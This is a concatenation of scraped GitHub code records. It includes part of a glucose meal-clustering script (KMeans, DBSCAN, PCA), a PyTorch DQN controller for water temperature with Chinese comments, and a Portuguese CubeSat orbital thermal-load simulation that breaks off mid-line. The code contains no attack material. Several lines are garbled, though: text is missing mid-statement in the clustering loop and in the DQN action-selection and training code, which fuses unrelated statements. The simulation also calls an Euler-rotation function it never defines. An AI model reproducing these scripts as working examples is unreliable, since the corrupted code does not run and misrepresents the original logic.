df['Date'].dt.strftime(\"%m/%d/%y\")\r\n\r\ndf['Time'] = pd.to_datetime(df['Time'])\r\n\r\ndf['Time'] = df['Time'].dt.strftime(\"%H:%M:%S\")\r\n\r\n###########################################\r\n#reformatting dataframe\r\n###########################################\r\n\r\ndf['Date_Time'] = df['Date']+' '+df['Time']\r\ndf['Date_Time']=pd.to_datetime(df['Date_Time'])\r\ndf = df.set_index('Date_Time')\r\ndf = df.sort_values(by='Date_Time')\r\ndfx=df.interpolate(method ='linear', limit_direction ='forward')\r\n\r\ndf1 = df1.dropna()\r\n\r\n\r\ndf1['Date_Time'] = df1['Date']+' '+df1['Time']\r\ndf1['Date_Time']=pd.to_datetime(df1['Date_Time'])\r\ndf1 = df1.sort_values(by='Date_Time')\r\n\r\nmt=df1[[\"Date_Time\"]]\r\n\r\n####################################################\r\n#mealtime data\r\n####################################################\r\nmtx=mt\r\nmtx=mtx.set_index('Date_Time')\r\nmtx['dt']=mtx.index\r\nmtx['delta'] = (mtx['dt']-mtx['dt'].shift())\r\ntexma=0\r\nte1=pd.to_datetime(texma)\r\nte2=pd.to_datetime(texma)\r\ndel1=te1-te2\r\nmtx['delta'].fillna(value=del1)\r\nmtf=mtx.loc[(mtx['delta']>='02:00:00')]\r\nmtf['time1']=mtf['dt'] - timedelta(minutes=30)\r\nmtf['time2']=mtf['dt'] + timedelta(hours=2)\r\nmtf['time3']=mtf['dt'] + timedelta(hours=4)\r\nmati=mtf['dt'].values.tolist()\r\nmati1=pd.to_datetime(mati)\r\ndf3=df1\r\ndf3=df3.set_index('Date_Time')\r\ndf3['dt']=mtx.index\r\ndf3['delta'] = (df3['dt']-df3['dt'].shift())\r\ndf3['delta'].fillna(value=del1)\r\ndf3=df3.loc[(df3['delta']>='02:00:00')]\r\ncarb=df3['BWZ Carb Input (grams)'].values.tolist()\r\nmd=[]\r\nmdld1=[]\r\nfor i in range(len(mtf)):\r\n la=dfx.loc[(dfx.index>mtf['time1'][i])&(dfx.index maxi):\r\n break\r\n\r\n\r\ndf5['binned'] = pd.cut(df5[df5.columns[30]], bins=bins,labels = lables)\r\nlabl1=df5['binned']\r\n#df1['binned'] = pd.cut(df1['BWZ Carb Input (grams)'], bins=bins,labels = lables)\r\n#labelmat=df1['binned']\r\nnob=len(lables)\r\n\r\n\r\n######################################################\r\n#feature1 \r\n######################################################\r\n\r\n\r\nmac=meld.max(axis=1)\r\nminim=meld.min(axis=1)\r\ncgmdiff=mac-minim\r\ncgmdiff1=np.array(cgmdiff)\r\ncdiff2=np.reshape(cgmdiff1, (len(cgmdiff), 1))\r\n\r\nsc = StandardScaler()\r\n\r\ncdiff2 = sc.fit_transform(cdiff2)\r\n\r\n\r\n#######################################################\r\n#feature2\r\n#######################################################\r\n\r\nglobal FFT_Feature_Matrix\r\nFFT_coefficents = []\r\nfor it in range(meld.shape[0]):\r\n FFT_coefficents.append(np.abs(np.fft.fft((meld.iloc[it,::-1])))[1:9])\r\nFFT_Feature_Matrix = pd.DataFrame(list(map(np.ravel, FFT_coefficents)))\r\n\r\nFFT_Feature_Matrix = sc.fit_transform(FFT_Feature_Matrix)\r\n\r\n#for it in range(meld.shape[0]):\r\n# \r\n# FFT_coefficents.append(np.abs(np.fft.fft((meld.iloc[it,::-1]))))\r\n# FFT_Feature_Matrix = []\r\n# \r\n#for c in range(0,len(FFT_coefficents)):\r\n# FFT_Feature_Matrix.append(FFT_coefficents[c][1:9]) # Take top 8\r\n#print(len(FFT_Feature_Matrix))\r\n\r\n#########################################################\r\n#f3\r\n#########################################################\r\n\r\nGroup_mean1 = []\r\nGroup_mean2 = []\r\nGroup_mean3 = []\r\nGroup_mean4 = []\r\nGroup_mean5 = []\r\nfor i in range(meld.shape[0]):\r\n Group_mean1.append(meld.iloc[i,0:5].mean())\r\n Group_mean2.append(meld.iloc[i,6:11].mean())\r\n Group_mean3.append(meld.iloc[i,12:17].mean())\r\n Group_mean4.append(meld.iloc[i,18:23].mean())\r\n 
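# The five window means summarize the 30-sample meal response in roughly\r\n    # six-sample chunks. Note the slices are uneven: 0:5, 6:11, 12:17, 18:23,\r\n    # 23:29 cover 5+5+5+5+6 columns and skip columns 5, 11, 17 and 29;\r\n    # contiguous six-sample windows would be 0:6, 6:12, 12:18, 18:24, 24:30.\r\n    # The original slicing is kept so existing results stay reproducible.\r\n    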
Group_mean5.append(meld.iloc[i,23:29].mean())\r\n    \r\nGroup_mean = sc.fit_transform(pd.DataFrame([Group_mean1,Group_mean2,Group_mean3,Group_mean4,Group_mean5]))\r\n\r\n#f4\r\npolycoeff = []\r\nfor i in range(meld.shape[0]):\r\n    polycoeff.append(np.polyfit(np.linspace(0,30,30), meld.iloc[i,:], 5))\r\n\r\npoly_coeff = sc.fit_transform(pd.DataFrame(polycoeff).transpose())\r\n    \r\n#Feture_Matrix = np.stack((\r\n#        np.array(Group_mean1),\r\n#        np.array(Group_mean2),\r\n#        np.array(Group_mean3),\r\n#        np.array(Group_mean4),\r\n#        np.array(Group_mean5),\r\n#        ))\r\n#fm1=np.hstack((np.transpose(Feture_Matrix),\r\n#               np.array(cdiff2),\r\n#               np.array(FFT_Feature_Matrix),\r\n#               np.array(polycoeff)))\r\nFeture_Matrix = pd.concat([\r\n        pd.DataFrame(Group_mean).transpose(),\r\n        pd.DataFrame(cdiff2),\r\n        pd.DataFrame(FFT_Feature_Matrix),\r\n        pd.DataFrame(poly_coeff).transpose()],axis=1,ignore_index=True\r\n        )\r\nFeture_Matrix = Feture_Matrix.to_numpy()\r\npca = PCA(n_components=9)\r\nFeture_Matrix = pca.fit_transform(Feture_Matrix)\r\n\r\n################################################\r\n#kmeans\r\n################################################\r\n\r\nkm = KMeans(n_clusters=nob,init='k-means++',n_init=10,max_iter=300,tol=1e-4,random_state=5)\r\ny_km = km.fit_predict(Feture_Matrix)\r\nkm1=km.fit(Feture_Matrix)\r\nsse=km1.inertia_\r\n\r\n\r\n################################################\r\n#dbscan\r\n################################################\r\ndbsc = DBSCAN(eps=1.5,min_samples=2)\r\ndbsc1 = dbsc.fit_predict(Feture_Matrix)\r\n\r\n\r\n################################################\r\n#entropy and purity\r\n################################################\r\ndef confmat(n,l1,l2):\r\n    mat=[[0]*n for _ in range (n)]\r\n    for i in range (n):\r\n        for j in range(n):\r\n            mat[i][j]=sum((l1==j)&(l2==i))\r\n    return np.array(mat)\r\n\r\n\r\nc1= confmat(nob,labl1,y_km) # pass the predicted cluster labels (y_km), not the fitted estimator\r\nfields=['SSE']\r\nsse1=[]\r\nsse1.append(sse)\r\nfilename = \"results.csv\"\r\n    \r\n# writing to csv file \r\nwith open(filename, 'w') as csvfile: \r\n    # creating a csv writer object \r\n    csvwriter = csv.writer(csvfile) \r\n        \r\n    # writing the fields \r\n    csvwriter.writerow(fields) \r\n        \r\n    # writing the data rows \r\n    csvwriter.writerow(sse1) ","repo_name":"avkumar27/data-mining","sub_path":"project3.py","file_name":"project3.py","file_ext":"py","file_size_in_byte":8037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41290034642","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport water\n\nBATCH_SIZE=40\nLR=0.01\nEPSILON=0.9\nGAMMA=0.9\nTARGET_RELACE_ITER=100\nMEMORY_CAPACITY=1000\nN_ACTIONS=3#加、减冷水 and 加、减热水\nN_STATES=4#冷水流量、温度 or 热水流量、温度) and 容器内水温、水量\nclass net(nn.Module):\n    \"\"\"docstring for net\"\"\"\n    def __init__(self, ):\n        super(net, self).__init__()\n        self.fc1=nn.Linear(N_STATES,10)\n        self.fc1.weight.data.normal_(0,0.1)\n        self.out=nn.Linear(10,N_ACTIONS)\n        self.out.weight.data.normal_(0,0.1)\n    def forward(self,x):\n        x=self.fc1(x)\n        x=F.relu(x)\n        actions_value=self.out(x)\n        return actions_value\nclass DQN(object):\n    \"\"\"docstring for DQN\"\"\"\n    def __init__(self):\n        super(DQN, self).__init__()\n        self.eval_hot_net,self.eval_cold_net,self.target_hot_net,self.target_cold_net=\\\n            net().cuda(),net().cuda(),net().cuda(),net().cuda()\n\n        self.learn_step_counter=0#\n        self.memory_counter=0#学习进度\n        
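# Twin-network, twin-controller setup: the hot- and cold-water valves each\n        # get an eval net (updated every step) and a target net (synced\n        # periodically), the standard DQN arrangement for stable TD targets.\n        # The replay buffer below stores one transition per row; its width (15)\n        # is the author's packing of (state, action, reward, next state) for\n        # both controllers, defined where transitions are stored.\n        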
self.memory=np.zeros((MEMORY_CAPACITY,15))#记忆库\n self.optimizer_hot=torch.optim.Adam(self.eval_hot_net.parameters(),lr=LR)\n self.optimizer_cold = torch.optim.Adam(self.eval_cold_net.parameters(), lr=LR)\n self.loss_func=nn.MSELoss()\n def choose_action(self,x_hot,x_cold):\n x_hot=Variable(torch.unsqueeze(torch.FloatTensor(x_hot),0))\n x_cold = Variable(torch.unsqueeze(torch.FloatTensor(x_cold), 0))\n if np.random.uniform() MEMORY_CAPACITY:\n Dqn.learn() # 记忆库满了就进行学习\n k += 1\n K=np.append(K,[[s[-4],s[-3],r,s_hot[1],s_cold[1]]],axis=0)\n if done: # 如果回合结束, 进入下回合\n #R=np.mean(np.sqrt((K[-40:, 0]-42)**2))\n R=-len([i for i in K[0:, 0] if 43 >=i>= 41])#以在41-43度区间内点数量最多的为最优结果\n #R = np.mean(K[-20:, 2])\n R_=np.append(R_,R)\n if R1>R:# 当前训练时间大于删一个训练时间,将长的保留下来\n K1,k1,R1,I=K,k,R,i\n break\n s_hot,s_cold = s_[[0,1,4,5]],s_[[2,3,4,5]]\n L=s[-3]\nT_max = np.max(K1[0:, 0]).astype(int)\nplt.figure()#最优训练结果温度变化曲线\nplot1_0=plt.plot(K1[0:,1],K1[0:,0])#温度水量变化曲线\nplot1_1 = plt.plot([0,K1[-1,1]],[42,42])#42度水温标准线\n\nlow=np.array([np.append(i,s) for s,i in enumerate(K1[0:,[0,1]]) if 41>i[0]>=0])\nplot1_2=plt.plot(low[:,1],low[:,0],'.b',[low[0,1],low[0,1]],[0,T_max],'b',[low[-1,1],low[-1,1]],[0,T_max],'b')#温度水量变化曲线,低温\n\nok=np.array([np.append(i,s) for s,i in enumerate(K1[0:,[0,1]]) if 43>=i[0]>=41])\nplot1_3=plt.plot(ok[:,1],ok[:,0],'.g',[ok[0,1],ok[0,1]],[0,T_max],'g',[ok[-1,1],ok[-1,1]],[0,T_max],'g')#温度水量变化曲线,合适\n\nxList=np.hstack([low[[0,-1],1],ok[[0,-1],1]])\nyList=np.hstack([low[[0,-1],2],ok[[0,-1],2]])\n\nhigh=np.array([np.append(i,s) for s,i in enumerate(K1[0:,[0,1]]) if i[0]>43])\nif len(high)>0:\n plot1_4=plt.plot(high[:,1],high[:,0],'.r',[high[0,1],high[0,1]],[0,T_max],'r',[high[-1,1],high[-1,1]],[0,T_max],'r')#温度水量变化曲线,高温\n xList = np.hstack([xList, high[[0, -1], 1]])\n yList = np.hstack([yList, high[[0, -1], 2]])\n\nfor s,[x, y] in enumerate(zip(xList, yList)):\n y=y*10//60+y*10%60/100\n y2=20.3+s*2.5\n plot1_5=plt.text(x,y2, '%.2f'%y, ha='center', va='bottom', fontsize=10.5)\nplt.title('T_change')\nplt.figure()#最优训练结果温R值变化曲线\nplot3 = plt.plot(K1[0:,1],K1[0:,2])\nplt.title('R')\n\nplt.figure()#最优训练结果的冷热水流量变化曲线,红色:热水;蓝色:冷水\nplot5 = plt.plot(K1[0:,1],K1[0:,3],'r')\nplot6 = plt.plot(K1[0:,1],K1[0:,4],'b')\nplt.title('water_hot and water_cold')\n\nplt.figure()#训练次数内训练结果曲线\nplot4 = plt.plot(range(L1),R_)\nplt.title('R_change1-'+str(L1))\n\nprint('各温度的持续时间(分钟):\\n[0-41)°区间:',len(low)*10//60,'分',(len(low)*10%60),'秒',\n '\\n[41-43]:',len(ok)*10//60,'分',(len(ok)*10%60),'秒',\n '\\n(43,):',len(high)*10//60,'分',(len(high)*10%60),'秒',\n '\\n最高温度:',T_max,\n '\\n水量:',K1[-1,1],\n '\\n总时长:',K1.shape[0]*10//60,'分',K1.shape[0]*10%60,'秒',\n '\\n第',I,'次时达到')\nplt.show()\n\n","repo_name":"Fantomeworking/DQN-Water-temperature-regulation","sub_path":"dqn2.py","file_name":"dqn2.py","file_ext":"py","file_size_in_byte":7801,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"16102305720","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Aug 26 10:55:14 2022\n\n@author: T2F-7\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport euler_angle\nimport terra\nimport orientacao_quat\nimport periodo_orbital\nimport propagador_orbital_mk3\nimport sup_terra\n\nm = float(3) # massa do cubesat\na = float(0.1) # comprimento do sat\nb = float(0.1) # largura do sat\nc = float(0.2) # altura do sat\n\nIa = (m / 12) * (b ** 2 + c ** 2) # momento de inercia na direcao x\nIb = (m / 12) * (a ** 2 + c ** 2) # momento de inercia na direcao 
y\nIc = (m / 12) * (a ** 2 + b ** 2) # momento de inercia na direcao z\n\nrp = 7000 # semi eixo maior\necc = float(0.0) # ecentricidade da orbita\nRaan = float(0.0) # ascencao direita do nodo ascendente\narg_per = (float(0.0)) # argumento do perigeu\ntrue_anomaly = (float(110.0)) # anomalia verdadeira\ninc = (float(51.6)) # inclinacao\nmu = 398600 # constante gravitacional da terra\nJ2 = 1.08263e-3 # zona harmonica 2\nRaio_terra = float(6371) # raio da terra\nnum_orbita = 1 # numero de obitas\nIs = 1367.0\nIr = 267.0\ne = 1.0\nai = 1.0\nT_orbita = periodo_orbital.periodo_orbital(rp)\npasso = 10000\ngama = 0.3\n\nPSIP = 0.0\nTETAP = 0.0\nPHIP = (2 * np.pi) / T_orbita\npsi0 = Raan\nteta0 = inc\nphi0 = 0.0\n\npsi = []\nteta = []\nphi = []\n\nPosi_XYZ = propagador_orbital_mk3.propagador_orbital(rp, ecc, Raan, true_anomaly, inc, arg_per, num_orbita, 0)\n\nxyz = orientacao_quat.orientacao_quat(Ia, Ib, Ic, PSIP, TETAP, PHIP, psi0, teta0, phi0, T_orbita)\n\nori_xyz = np.zeros((len(Posi_XYZ), 3))\nK = len(xyz) / len(Posi_XYZ)\nj = 0\nfor i in range(0, len(xyz), int(K)):\n ori_xyz[j][0] = xyz[i][0]\n ori_xyz[j][1] = xyz[i][1]\n ori_xyz[j][2] = xyz[i][2]\n j = j + 1\nT = np.linspace(0, len(Posi_XYZ), len(Posi_XYZ))\nR_terra = terra.terra(Raio_terra, 10)\n\nVs = np.array([1, 0, 0])\n\nAi = [a * c,\n b * c,\n a * c,\n b * c,\n a * b,\n a * b]\n\nNi = [[1, 0, 0],\n [0, 1, 0],\n [-1, 0, 0],\n [0, -1, 0],\n [0, 0, -1],\n [0, 0, 1]]\n\nQs1 = []\nQs2 = []\nQs3 = []\nQs3 = []\nQs4 = []\nQs5 = []\nQs6 = []\n\nfor i in range(0, len(Posi_XYZ), 1):\n\n PSI = np.arccos(np.dot(Posi_XYZ[i], Vs) / (np.linalg.norm(Posi_XYZ[i]) * np.linalg.norm(Vs)))\n QSI = np.arcsin(Raio_terra / float(np.sqrt(Posi_XYZ[i][0] ** 2 + Posi_XYZ[i][1] ** 2 + Posi_XYZ[i][2] ** 2)))\n\n if PSI + QSI < np.pi:\n\n A1 = rotacao_Euler_2(Ni[0], ori_xyz[i][0], ori_xyz[i][1], ori_xyz[i][2])\n A2 = rotacao_Euler_2(Ni[1], ori_xyz[i][0], ori_xyz[i][1], ori_xyz[i][2])\n A3 = rotacao_Euler_2(Ni[2], ori_xyz[i][0], ori_xyz[i][1], ori_xyz[i][2])\n A4 = rotacao_Euler_2(Ni[3], ori_xyz[i][0], ori_xyz[i][1], ori_xyz[i][2])\n A5 = rotacao_Euler_2(Ni[4], ori_xyz[i][0], ori_xyz[i][1], ori_xyz[i][2])\n A6 = rotacao_Euler_2(Ni[5], ori_xyz[i][0], ori_xyz[i][1], ori_xyz[i][2])\n\n k1 = np.dot(A1, Vs)\n k2 = np.dot(A2, Vs)\n k3 = np.dot(A3, Vs)\n k4 = np.dot(A4, Vs)\n k5 = np.dot(A5, Vs)\n k6 = np.dot(A6, Vs)\n\n if k1 > 0:\n qs1 = ai * Is * k1\n Qs1.append(qs1)\n else:\n Qs1.append(0)\n if k2 > 0:\n qs2 = ai * Is * k2\n Qs2.append(qs2)\n else:\n Qs2.append(0)\n\n if k3 > 0:\n qs3 = ai * Is * k3\n Qs3.append(qs3)\n else:\n Qs3.append(0)\n if k4 > 0:\n qs4 = ai * Is * k4\n Qs4.append(qs4)\n else:\n Qs4.append(0)\n if k5 > 0:\n qs5 = ai * Is * k5\n Qs5.append(qs5)\n else:\n Qs5.append(0)\n if k6 > 0:\n qs6 = ai * Is * k6\n Qs6.append(qs6)\n else:\n Qs6.append(0)\n\n else:\n Qs1.append(0)\n Qs2.append(0)\n Qs3.append(0)\n Qs4.append(0)\n Qs5.append(0)\n Qs6.append(0)\n\nQtotal = [[Qs1],\n [Qs2],\n [Qs3],\n [Qs4],\n [Qs5],\n [Qs6]]\n''' \nQ_total = [] \nfor i in range (0, 200, 1):\n Q_total.append(Qs1[i] + Qs2[i] + Qs3[i] + Qs4[i] + Qs5[i] + Qs6[i])\n'''\n\n'''\nplt.xlabel(\"Ponto da orbita\")\nplt.ylabel(\"Calor incidente em cada face [W/m^2]\")\nplt.plot(T, Qs1, color ='green', label='N1')\nplt.plot(T, Qs2, color = 'blue', label='N2')\nplt.plot(T, Qs3, color = 'cyan', label='N3')\nplt.plot(T, Qs4, color = 'yellow', label='N4')\nplt.plot(T, Qs5, color = 'red', label='N5')\nplt.plot(T, Qs6, color = 'magenta', label='N6') \n'''\n\ndivisao = int(5)\nTerra = 
terra.terra(Raio_terra, divisao)\nAs = sup_terra.sup_terra(Raio_terra, divisao)\nx = []\ny = []\nz = []\nfor i in range(0, len(Terra), 1):\n x.append(Terra[i][0])\n y.append(Terra[i][1])\n z.append(Terra[i][2])\n'''\nfig = plt.figure(figsize=(10,7))\nax = plt.axes(projection = \"3d\")\nax.scatter3D(x,y,z)\nplt.show() \n'''\n\n''' Albedo '''\n\nHalb1 = 0\nHalb2 = 0\nHalb3 = 0\nHalb4 = 0\nHalb5 = 0\nHalb6 = 0\n\nQalb1 = []\nQalb2 = []\nQalb3 = []\nQalb4 = []\nQalb5 = []\nQalb6 = []\n\nH1 = []\nH2 = []\nH3 = []\nH4 = []\nH5 = []\nH6 = []\n\nRhok = []\nprod_vet = []\n\nfor i in range(0, len(Posi_XYZ), 1):\n\n PSI = np.arccos(np.dot(Posi_XYZ[i], Vs) / (np.linalg.norm(Posi_XYZ[i]) * np.linalg.norm(Vs)))\n QSI = np.arcsin(Raio_terra / float(np.sqrt(Posi_XYZ[i][0] ** 2 + Posi_XYZ[i][1] ** 2 + Posi_XYZ[i][2] ** 2)))\n\n A1 = rotacao_Euler_2(Ni[0], ori_xyz[i][0], ori_xyz[i][1], ori_xyz[i][2])\n A2 = rotacao_Euler_2(Ni[1], ori_xyz[i][0], ori_xyz[i][1], ori_xyz[i][2])\n A3 = rotacao_Euler_2(Ni[2], ori_xyz[i][0], ori_xyz[i][1], ori_xyz[i][2])\n A4 = rotacao_Euler_2(Ni[3], ori_xyz[i][0], ori_xyz[i][1], ori_xyz[i][2])\n A5 = rotacao_Euler_2(Ni[4], ori_xyz[i][0], ori_xyz[i][1], ori_xyz[i][2])\n A6 = rotacao_Euler_2(Ni[5], ori_xyz[i][0], ori_xyz[i][1], ori_xyz[i][2])\n\n if PSI + QSI < np.pi:\n\n for k in range(0, len(Terra), 1):\n\n rhok1 = np.array(Posi_XYZ[i]) - np.array(Terra[k]) + np.array(A1)\n rhok2 = np.array(Posi_XYZ[i]) - np.array(Terra[k]) + np.array(A2)\n rhok3 = np.array(Posi_XYZ[i]) - np.array(Terra[k]) + np.array(A3)\n rhok4 = np.array(Posi_XYZ[i]) - np.array(Terra[k]) + np.array(A4)\n rhok5 = np.array(Posi_XYZ[i]) - np.array(Terra[k]) + np.array(A5)\n rhok6 = np.array(Posi_XYZ[i]) - np.array(Terra[k]) + np.array(A6)\n\n rhok = np.array(Posi_XYZ[i]) - np.array(Terra[k])\n\n Rhok.append(rhok)\n prod_vet.append(np.dot(rhok, Terra[k]))\n\n C_bek = np.dot(Vs, Terra[k]) / (np.linalg.norm(Vs) * np.linalg.norm(Terra[k]))\n\n if np.dot(rhok1, Terra[k]) > 0:\n\n C_aek1 = np.dot(rhok1, Terra[k]) / (np.linalg.norm(rhok1) * np.linalg.norm(Terra[k]))\n C_aik1 = (np.dot(-rhok1, A1)) / (np.linalg.norm(rhok1) * np.linalg.norm(A1))\n\n if C_aik1 > 0 and C_aek1 > 0 and C_bek > 0:\n\n Balb = float(1.0)\n\n Halb1 = Halb1 + (As[k] * ((C_aek1 * C_bek * C_aik1) / (np.pi * np.linalg.norm(rhok1) ** 2)) * Balb)\n else:\n Balb = float(0.0)\n\n Halb1 = Halb1 + (As[k] * ((C_aek1 * C_bek * C_aik1) / (np.pi * np.linalg.norm(rhok1) ** 2)) * Balb)\n\n if np.dot(rhok2, Terra[k]) > 0:\n\n C_aek2 = np.dot(rhok2, Terra[k]) / (np.linalg.norm(rhok2) * np.linalg.norm(Terra[k]))\n C_aik2 = (np.dot(-rhok2, A2)) / (np.linalg.norm(rhok2) * np.linalg.norm(A2))\n\n if C_aik2 > 0 and C_aek2 > 0 and C_bek > 0:\n\n Balb = float(1.0)\n\n Halb2 = Halb2 + (As[k] * ((C_aek2 * C_bek * C_aik2) / (np.pi * np.linalg.norm(rhok2) ** 2)) * Balb)\n else:\n Balb = float(0.0)\n\n Halb2 = Halb2 + (As[k] * ((C_aek2 * C_bek * C_aik2) / (np.pi * np.linalg.norm(rhok2) ** 2)) * Balb)\n\n if np.dot(rhok3, Terra[k]) > 0:\n\n C_aek3 = np.dot(rhok3, Terra[k]) / (np.linalg.norm(rhok3) * np.linalg.norm(Terra[k]))\n C_aik3 = (np.dot(-rhok3, A3)) / (np.linalg.norm(rhok3) * np.linalg.norm(A3))\n\n if C_aik3 > 0 and C_aek3 > 0 and C_bek > 0:\n\n Balb = float(1.0)\n\n Halb3 = Halb3 + (As[k] * ((C_aek3 * C_bek * C_aik3) / (np.pi * np.linalg.norm(rhok3) ** 2)) * Balb)\n\n else:\n Balb = float(0.0)\n\n Halb3 = Halb3 + (As[k] * ((C_aek3 * C_bek * C_aik3) / (np.pi * np.linalg.norm(rhok3) ** 2)) * Balb)\n\n if np.dot(rhok4, Terra[k]) > 0:\n\n C_aek4 = np.dot(rhok4, Terra[k]) 
/ (np.linalg.norm(rhok4) * np.linalg.norm(Terra[k]))\n C_aik4 = (np.dot(-rhok4, A4)) / (np.linalg.norm(rhok4) * np.linalg.norm(A4))\n\n if C_aik4 > 0 and C_aek4 > 0 and C_bek > 0:\n\n Balb = float(1.0)\n\n Halb4 = Halb4 + (As[k] * ((C_aek4 * C_bek * C_aik4) / (np.pi * np.linalg.norm(rhok4) ** 2)) * Balb)\n else:\n Balb = float(0.0)\n\n Halb4 = Halb4 + (As[k] * ((C_aek4 * C_bek * C_aik4) / (np.pi * np.linalg.norm(rhok4) ** 2)) * Balb)\n\n if np.dot(rhok5, Terra[k]) > 0:\n\n C_aek5 = np.dot(rhok5, Terra[k]) / (np.linalg.norm(rhok5) * np.linalg.norm(Terra[k]))\n C_aik5 = (np.dot(-rhok5, A5)) / (np.linalg.norm(rhok5) * np.linalg.norm(A5))\n\n if C_aik5 > 0 and C_aek5 > 0 and C_bek > 0:\n\n Balb = float(1.0)\n\n Halb5 = Halb5 + (As[k] * ((C_aek5 * C_bek * C_aik5) / (np.pi * np.linalg.norm(rhok5) ** 2)) * Balb)\n else:\n Balb = float(0.0)\n\n Halb5 = Halb5 + (As[k] * ((C_aek5 * C_bek * C_aik5) / (np.pi * np.linalg.norm(rhok5) ** 2)) * Balb)\n\n if np.dot(rhok6, Terra[k]) > 0:\n\n C_aek6 = np.dot(rhok6, Terra[k]) / (np.linalg.norm(rhok6) * np.linalg.norm(Terra[k]))\n C_aik6 = (np.dot(-rhok6, A6)) / (np.linalg.norm(rhok6) * np.linalg.norm(A6))\n\n if C_aik6 > 0 and C_aek6 > 0 and C_bek > 0:\n\n Balb = float(1.0)\n\n Halb6 = Halb6 + (As[k] * ((C_aek6 * C_bek * C_aik6) / (np.pi * np.linalg.norm(rhok6) ** 2)) * Balb)\n else:\n Balb = float(0.0)\n\n Halb6 = Halb6 + (As[k] * ((C_aek6 * C_bek * C_aik6) / (np.pi * np.linalg.norm(rhok6) ** 2)) * Balb)\n\n H1.append(Halb1)\n Qalb1.append(ai * gama * Is * Halb1)\n Halb1 = 0\n\n H2.append(Halb2)\n Qalb2.append(ai * gama * Is * Halb2)\n Halb2 = 0\n\n H3.append(Halb3)\n Qalb3.append(ai * gama * Is * Halb3)\n Halb3 = 0\n\n H4.append(Halb4)\n Qalb4.append(ai * gama * Is * Halb4)\n Halb4 = 0\n\n H5.append(Halb5)\n Qalb5.append(ai * gama * Is * Halb5)\n Halb5 = 0\n\n H6.append(Halb6)\n Qalb6.append(ai * gama * Is * Halb6)\n Halb6 = 0\n else:\n Qalb1.append(0)\n Qalb2.append(0)\n Qalb3.append(0)\n Qalb4.append(0)\n Qalb5.append(0)\n Qalb6.append(0)\n\n''' Radiacao da terra '''\n\nHrad1 = 0\nHrad2 = 0\nHrad3 = 0\nHrad4 = 0\nHrad5 = 0\nHrad6 = 0\n\nQrad1 = []\nQrad2 = []\nQrad3 = []\nQrad4 = []\nQrad5 = []\nQrad6 = []\n\nR1 = []\nR2 = []\nR3 = []\nR4 = []\nR5 = []\nR6 = []\n\nRrhok = []\nprod_vet2 = []\n\nfor i in range(0, len(Posi_XYZ), 1):\n\n A1 = rotacao_Euler_2(Ni[0], ori_xyz[i][0], ori_xyz[i][1], ori_xyz[i][2])\n A2 = rotacao_Euler_2(Ni[1], ori_xyz[i][0], ori_xyz[i][1], ori_xyz[i][2])\n A3 = rotacao_Euler_2(Ni[2], ori_xyz[i][0], ori_xyz[i][1], ori_xyz[i][2])\n A4 = rotacao_Euler_2(Ni[3], ori_xyz[i][0], ori_xyz[i][1], ori_xyz[i][2])\n A5 = rotacao_Euler_2(Ni[4], ori_xyz[i][0], ori_xyz[i][1], ori_xyz[i][2])\n A6 = rotacao_Euler_2(Ni[5], ori_xyz[i][0], ori_xyz[i][1], ori_xyz[i][2])\n\n for k in range(0, len(Terra), 1):\n\n Rhok1 = np.array(Posi_XYZ[i]) - np.array(Terra[k]) + np.array(A1)\n Rhok2 = np.array(Posi_XYZ[i]) - np.array(Terra[k]) + np.array(A2)\n Rhok3 = np.array(Posi_XYZ[i]) - np.array(Terra[k]) + np.array(A3)\n Rhok4 = np.array(Posi_XYZ[i]) - np.array(Terra[k]) + np.array(A4)\n Rhok5 = np.array(Posi_XYZ[i]) - np.array(Terra[k]) + np.array(A5)\n Rhok6 = np.array(Posi_XYZ[i]) - np.array(Terra[k]) + np.array(A6)\n\n if np.dot(Rhok1, Terra[k]) > 0:\n\n C_aek1 = np.dot(Rhok1, Terra[k]) / (np.linalg.norm(Rhok1) * np.linalg.norm(Terra[k]))\n C_aik1 = (np.dot(-Rhok1, A1)) / (np.linalg.norm(Rhok1) * np.linalg.norm(A1))\n\n if C_aik1 > 0 and C_aek1 > 0:\n\n Balb = float(1.0)\n\n Hrad1 = Hrad1 + (As[k] * ((C_aek1 * C_aik1) / (np.pi * np.linalg.norm(Rhok1) ** 2)) 
* Balb)\n else:\n Balb = float(0.0)\n\n Hrad1 = Hrad1 + (As[k] * ((C_aek1 * C_aik1) / (np.pi * np.linalg.norm(Rhok1) ** 2)) * Balb)\n\n if np.dot(Rhok2, Terra[k]) > 0:\n\n C_aek2 = np.dot(Rhok2, Terra[k]) / (np.linalg.norm(Rhok2) * np.linalg.norm(Terra[k]))\n C_aik2 = (np.dot(-Rhok2, A2)) / (np.linalg.norm(Rhok2) * np.linalg.norm(A2))\n\n if C_aik2 > 0 and C_aek2 > 0:\n\n Balb = float(1.0)\n\n Hrad2 = Hrad2 + (As[k] * ((C_aek2 * C_aik2) / (np.pi * np.linalg.norm(Rhok2) ** 2)) * Balb)\n else:\n Balb = float(0.0)\n\n Hrad2 = Hrad2 + (As[k] * ((C_aek2 * C_aik2) / (np.pi * np.linalg.norm(Rhok2) ** 2)) * Balb)\n\n if np.dot(Rhok3, Terra[k]) > 0:\n\n C_aek3 = np.dot(Rhok3, Terra[k]) / (np.linalg.norm(Rhok3) * np.linalg.norm(Terra[k]))\n C_aik3 = (np.dot(-Rhok3, A3)) / (np.linalg.norm(Rhok3) * np.linalg.norm(A3))\n\n if C_aik3 > 0 and C_aek3 > 0:\n\n Balb = float(1.0)\n\n Hrad3 = Hrad3 + (As[k] * ((C_aek3 * C_aik3) / (np.pi * np.linalg.norm(Rhok3) ** 2)) * Balb)\n else:\n Balb = float(0.0)\n\n Hrad3 = Hrad3 + (As[k] * ((C_aek3 * C_aik3) / (np.pi * np.linalg.norm(Rhok3) ** 2)) * Balb)\n\n if np.dot(Rhok4, Terra[k]) > 0:\n\n C_aek4 = np.dot(Rhok4, Terra[k]) / (np.linalg.norm(Rhok4) * np.linalg.norm(Terra[k]))\n C_aik4 = (np.dot(-Rhok4, A4)) / (np.linalg.norm(Rhok4) * np.linalg.norm(A4))\n\n if C_aik4 > 0 and C_aek4 > 0:\n\n Balb = float(1.0)\n\n Hrad4 = Hrad4 + 